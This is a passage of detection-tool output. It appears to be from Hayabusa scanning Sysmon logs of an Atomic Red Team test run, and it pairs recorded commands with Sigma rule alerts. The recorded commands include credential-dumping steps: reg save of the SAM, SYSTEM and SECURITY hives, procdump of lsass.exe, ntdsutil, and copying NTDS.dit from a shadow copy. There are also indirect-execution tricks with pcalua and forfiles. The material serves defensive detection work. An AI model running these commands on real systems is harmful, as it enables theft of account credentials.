C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:50.398 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:50.453 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 747F3D96-DA6E-5D31-0000-001081F93E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:52.923 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:52.982 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:53.882 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.099 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-DA72-5D31-0000-0010044F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.129 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.165 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:54.165 +00:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:55.069 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:55.138 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:55.236 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:58.359 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:58.359 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:40.973 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:43.329 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:59.931 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:09:59.931 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:10:52.700 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:07.994 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:07.994 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:07.994 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:08.184 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:08.184 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:16.487 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:16.487 +00:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:16.986 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.027 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.107 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.149 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.224 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.224 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.243 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:17.243 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.090 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.090 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.105 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:21.105 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.317 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.317 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.336 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:23.336 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.549 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,rules/sigma/process_creation_sysmon/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation_sysmon/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.642 +00:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.686 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.852 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.852 +00:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.852 +00:00,MSEDGEWIN10,1,high,CredAccess,Suspicious Process Patterns NTDS.DIT Exfil,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_ntds.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.884 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.971 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.989 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.989 +00:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.082 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.169 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.169 +00:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential 